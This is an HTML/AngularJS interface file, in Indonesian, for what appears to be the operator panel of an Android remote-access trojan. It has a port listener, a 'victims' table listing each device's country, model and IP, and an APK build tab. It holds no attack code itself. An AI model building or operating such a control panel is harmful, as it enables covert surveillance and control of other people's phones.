<!DOCTYPE html>
<html ng-app="myapp">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no" />

    <title>Phoenix</title>

    <!-- Insert this line above script imports  -->
    <script>
        if (typeof module === 'object') {
            window.module = module;
            module = undefined;
        }
    </script>


    <script type="text/javascript" src="assets/js/lib/jquery-3.1.1.min.js"></script>
    <script type="text/javascript" src="../node_modules/semantic-ui/dist/semantic.min.js"></script>
    <script type="text/javascript" src="../node_modules/angular/angular.js"></script>
    <script type="text/javascript" src="assets/js/controllers/AppCtrl.js"></script>
    <!-- Insert this line after script imports -->
    <script>
        if (window.module) module = window.module;
    </script>

    <link rel="stylesheet" href="assets/css/mystyle.css">
    <link rel="stylesheet" href="../node_modules/semantic-ui/dist/semantic.min.css" />


</head>

<body ng-controller="AppCtrl" class="draggable">
<style>
    body {
        background-color: rgb(71, 167, 170);
    }
</style>

    <div class="ui top attached tabular menu">
        <a class="item active notDraggable" data-tab="first">Target</a>
        <a class="item notDraggable" data-tab="second">APK Konfigurasi</a>
        <div class="ui right mini text menu notDraggable">
            <button class="ui circular orange button" ng-click="minimize()" style="font-size: 6px;height: 17px"></button>
            <button class="ui circular red button" ng-click="close()" style="font-size: 6px;height: 17px"></button>
        </div>
    </div>
    <div class="ui bottom attached tab segment active h60 notDraggable" data-tab="first">
        <div class="ui grid h100">
            <div class="row h30">
                <div class="column">
                    <div class="ui horizontal segments">
                        <div class="ui segment">
                            <h2 class="ui left floated header">
                                <img class="ui image" src="assets/img/victimsLab.png">
                                <div class="content">
                                    Target Laboratorium
                                </div>
                            </h2>
                        </div>
                        <div class="ui center aligned segment">
                            <div style="line-height: 70px">
                                <div class="ui right floated labeled input">
                                    <div class="ui label">
                                        Port
                                    </div>
                                    <input ng-disabled="isListen" type="text" ng-model="port" placeholder="Deafult 42474">
                                </div>
                                <button ng-disabled="isListen" ng-click="isListen=true;Listen(port);" class="ui labeled icon black  button"><i class="terminal icon" ></i>Listen</button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="row h75" style="overflow: scroll;">
                <div class="column">
                    <table class="ui table single line selectable">
                        <thead>
                            <tr>
                                <th></th>
                                <th>Negara</th>
                                <th>Merk</th>
                                <th>Model</th>
                                <th>Release</th>
                                <th>IP</th>
                                <th>Port</th>
                                <th></th>
                            </tr>
                        </thead>

                        <tbody>

                            <tr ng-repeat="(key, victim) in victims">
                                <td> <a class="ui black ribbon label" ng-click="openLab(key)">Buka Labolatorium</a></td>
                                <td ng-if="victim.country != null"><i class="{{victim.country}} flag"></i></td>
                                <td ng-if="victim.country == null"><i class="help circle icon"></i></td>
                                <td ng-bind="victim.manf"></td>
                                <td ng-bind="victim.model"></td>
                                <td ng-bind="victim.release"></td>
                                <td ng-bind="victim.ip"></td>
                                <td ng-bind="victim.port"></td>
                                <td></td>
                            </tr>

                        </tbody>
                    </table>
                </div>
            </div>

        </div>
    </div>
    <div class="ui bottom attached tab segment h60 notDraggable" data-tab="second">
        <div ng-include="'views/build.html'" class="full"></div>
    </div>

    </div>
        
    </div>    
    <div class="ui bottom attached black message h25 notDraggable" id="log" style="overflow: scroll;">
        <div ng-repeat="log in logs" class="log">
            <div class="w30" style="display: inline-block" ng-bind="log.date"></div>
            <div class="w65" style="display: inline-block" ng-style="{'color':log.color}" ng-bind="log.msg"></div>
        </div>
    </div>


</body>

</html>
